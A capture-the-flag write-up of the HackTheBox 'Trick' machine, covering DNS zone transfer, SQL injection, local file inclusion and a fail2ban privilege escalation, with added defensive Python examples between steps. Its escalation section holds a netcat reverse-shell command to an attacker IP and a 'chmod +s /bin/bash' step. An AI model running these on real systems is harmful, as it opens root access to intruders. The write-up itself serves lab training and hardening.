CTF-Writeups/HackTheBox/Trick.md
2023-02-10 17:31:39 +03:00


HackTheBox - Trick

NMAP

Nmap scan report for 10.129.85.201
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the web page we see a Bootstrap template which has nothing interesting

Fuzzing for files and directories didn't find anything either

PORT 53 (DNS)

With a DNS service running we can try to query DNS records or perform a DNS zone transfer. For that we need a domain name, which we can get by performing a reverse DNS lookup, which resolves the IP to a domain name

https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

dig -x 10.10.11.166 @10.10.11.166

Having found trick.htb, we can add it to the hosts file

Now, to enumerate further, we can perform a DNS zone transfer

This shows the root.trick.htb subdomain, but it doesn't take us anywhere. On performing a zone transfer with axfr

We get another domain name, preprod-payroll.trick.htb, so let's add this to the hosts file as well

Visiting this subdomain, we get a login page on which we can try default credentials

Which didn't work, so next I tried SQLi

That worked, so I tried running sqlmap, but it's time-based blind so it's going to take a lot of time to dump the data

Foothold

Going back to the site we can see a GET parameter page that fetches pages. I tried to perform LFI on that parameter but it didn't work

I tried running wfuzz against the parameter using an LFI wordlist

Which didn't work, but the web app had SQL injection in a ton of places. On viewing employee details and intercepting the request, we get a GET parameter id which is also vulnerable to SQLi

It shows that it's boolean-based blind, whereas on the login page it was time-based SQLi. With this we can perform LFI (read local files through the injection) to read the nginx vhost configuration file
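The two injection points above (the login form and the employee id parameter), as an added example that is not part of the original writeup: a constructed SQLite stand-in for the payroll database (the real schema and application code are not on the page, so the table and column names are assumptions) with the vulnerable string-built queries next to their parameterised versions. The employee query shows the boolean-blind behaviour the writeup observes: a row comes back or not depending on the injected condition, while the hardened version rejects anything that is not an integer before it reaches the database.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the payroll database; the real schema is
    # not on the page. Password hashing is left out to keep the focus on the injection.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO employees VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-placeholder')")
    return conn


def employee_vulnerable(conn, id_param):
    # Vulnerable: the id parameter is spliced into the SQL text, so attacker-controlled
    # conditions become part of the WHERE clause. The row is either returned or not,
    # which is exactly the true/false signal a boolean-based blind injection relies on.
    sql = f"SELECT name FROM employees WHERE id = {id_param}"
    return [row[0] for row in conn.execute(sql)]


def employee_hardened(conn, id_param):
    # Hardened: enforce the expected type, then bind the value as a parameter.
    # Anything that is not a plain integer never reaches the database.
    try:
        employee_id = int(id_param)
    except (TypeError, ValueError):
        return []
    cur = conn.execute("SELECT name FROM employees WHERE id = ?", (employee_id,))
    return [row[0] for row in cur]


def login_vulnerable(conn, username, password):
    # Vulnerable: the same splicing on the login form; quotes in the input rewrite the query.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    # Hardened: parameter binding keeps the input as data, never as SQL.
    cur = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    )
    row = cur.fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ("1", "1 AND 1=1", "1 AND 1=2"):
        print(f"id={payload!r:14} vulnerable={employee_vulnerable(db, payload)} "
              f"hardened={employee_hardened(db, payload)}")
    tautology = "' OR '1'='1"
    print("login vulnerable:", login_vulnerable(db, "admin", tautology))
    print("login hardened:  ", login_hardened(db, "admin", tautology))
```

The same true/false difference that makes the vulnerable endpoint enumerable is what an application log would show as a burst of requests for one id with varying conditions; the hardened version turns every such request into an empty result without touching the database.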

This shows another subdomain, preprod-marketing.trick.htb

Alternatively, we can enumerate this subdomain by running wfuzz

This loads up another site, having nothing special other than the same GET parameter, so I tried running the LFI wordlist here as well

This starts to give us some output on filtering the response

We have the username michael, so we can try to see if we can access his .ssh folder for id_rsa
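The page parameter above, as an added example that is not part of the original writeup (the marketing site's real code is not on the page, so the directory layout and file names are constructed in a temporary directory): the unconfined include that lets ../ segments walk out of the pages directory, beside a version that resolves the path and refuses anything that leaves the directory or is not an .html page.

```python
import os
import tempfile


def build_site_root():
    # Constructed stand-in for the marketing site: a pages directory the app is meant
    # to serve from, and a file one level above it that must never be reachable.
    root = tempfile.mkdtemp(prefix="marketing-")
    pages_dir = os.path.join(root, "pages")
    os.makedirs(pages_dir)
    with open(os.path.join(pages_dir, "about.html"), "w") as f:
        f.write("<h1>About</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("constructed secret: outside the pages directory")
    return pages_dir


def include_vulnerable(pages_dir, page):
    # Vulnerable: the page parameter is joined onto the base directory with no check,
    # so '../' segments (or an absolute path, which os.path.join lets replace the base)
    # walk out of pages_dir.
    with open(os.path.join(pages_dir, page)) as f:
        return f.read()


def is_confined(pages_dir, page):
    # Resolve symlinks and '..' first, then require the result to stay under pages_dir.
    # Checking the raw string for '../' is not enough; the resolved path is what the OS opens.
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, page))
    return os.path.commonpath([base, target]) == base


def include_hardened(pages_dir, page):
    # Hardened: refuse anything whose resolved path leaves the pages directory,
    # and only serve the file type this feature actually needs.
    if not page.endswith(".html") or not is_confined(pages_dir, page):
        raise PermissionError(f"refused page parameter: {page!r}")
    target = os.path.realpath(os.path.join(os.path.realpath(pages_dir), page))
    with open(target) as f:
        return f.read()


if __name__ == "__main__":
    pages = build_site_root()
    for param in ("about.html", "../secret.txt"):
        print(f"vulnerable {param!r}: {include_vulnerable(pages, param)!r}")
        try:
            print(f"hardened   {param!r}: {include_hardened(pages, param)!r}")
        except PermissionError as exc:
            print(f"hardened   {param!r}: {exc}")
```

A rejected request is worth logging with the raw parameter value: repeated refusals from one client against the page parameter are the server-side trace of the wordlist run described above.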

Privilege Escalation

Running sudo -l to check what we can run with sudo privileges

So we can restart the fail2ban service, but we don't know exactly what we need to edit. Being in the security group, we can check what permissions this group has

We have write access to this folder, which has the configuration files for fail2ban

I found an article explaining how we can abuse the fail2ban config file

https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7

For this we need to edit the actionban command in iptables-multiport.conf, so first let's copy this file to /tmp or another directory where we can edit it to include a reverse shell

/usr/bin/nc 10.10.14.39 2222 -e /bin/bash

After editing the config file, move it back to the action.d folder and restart the fail2ban service

Then start making failed login attempts; you'll get a reverse shell on your port

But our reverse shell connection dies. The reason is that the ban duration lasts only 10 seconds, and the host is banned after the 5th attempt

Instead of getting a reverse shell we can just make bash SUID with chmod +s /bin/bash

Performing invalid login attempts on SSH will trigger fail2ban on the 5th invalid attempt
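A defender's check for the condition this escalation depends on, added here and not part of the writeup or of fail2ban itself: it flags action.d entries that a non-root group or the world can write, and reads bantime and maxretry for the sshd jail so the 10 second ban / 5 attempt behaviour seen above is visible from the configuration. The directory tree it inspects is constructed in a temporary directory to mirror the writeup; the actionban line is fail2ban's stock iptables-multiport action, and the jail values are the ones stated above. On a real host, point the functions at /etc/fail2ban/action.d and /etc/fail2ban/jail.local.

```python
import configparser
import os
import stat
import tempfile


def writable_by_non_owner(path):
    # True when the group or others can write. Root-owned config that a non-root
    # group can modify is the condition the escalation above relies on.
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_action_dir(action_dir):
    """Return every file under action.d (and the directory itself, since a writable
    directory allows swapping files in) that is group- or world-writable.
    Expected result on a healthy host: an empty list."""
    findings = []
    if writable_by_non_owner(action_dir):
        findings.append(action_dir)
    for name in sorted(os.listdir(action_dir)):
        path = os.path.join(action_dir, name)
        if os.path.isfile(path) and writable_by_non_owner(path):
            findings.append(path)
    return findings


def jail_settings(jail_path, jail="sshd"):
    """Read bantime and maxretry for a jail, falling back to [DEFAULT] as fail2ban does.
    configparser (interpolation off) is used instead of fail2ban's own loader; it is
    sufficient for plain key = value lines."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False)
    cfg.read(jail_path)
    return {key: cfg.get(jail, key, fallback=None) for key in ("bantime", "maxretry")}


def build_fixture():
    # Constructed tree mirroring the writeup: group-writable action.d, a group-writable
    # iptables-multiport.conf, a correctly permissioned sibling, and a jail file with
    # the 10 second ban / 5 attempt values described above.
    root = tempfile.mkdtemp(prefix="f2b-audit-")
    action_dir = os.path.join(root, "action.d")
    os.makedirs(action_dir)
    os.chmod(action_dir, 0o775)
    weak = os.path.join(action_dir, "iptables-multiport.conf")
    with open(weak, "w") as f:
        f.write("[Definition]\nactionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>\n")
    os.chmod(weak, 0o664)
    sound = os.path.join(action_dir, "dummy.conf")
    with open(sound, "w") as f:
        f.write("[Definition]\nactionban = echo <ip>\n")
    os.chmod(sound, 0o644)
    jail = os.path.join(root, "jail.local")
    with open(jail, "w") as f:
        f.write("[DEFAULT]\nbantime = 10\nmaxretry = 5\n\n[sshd]\nenabled = true\n")
    return action_dir, jail


if __name__ == "__main__":
    action_dir, jail = build_fixture()
    for path in audit_action_dir(action_dir):
        print("WRITABLE BY NON-OWNER:", path)
    print("sshd jail:", jail_settings(jail))
```

The fix the audit points at is the obvious one: action.d and its files owned by root with mode 755/644, and no sudo rule that lets a group able to edit those files also restart the service, because the restart is what loads the edited actionban. The same audit applies to filter.d and jail.d, which fail2ban reads under the same trust assumptions.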

References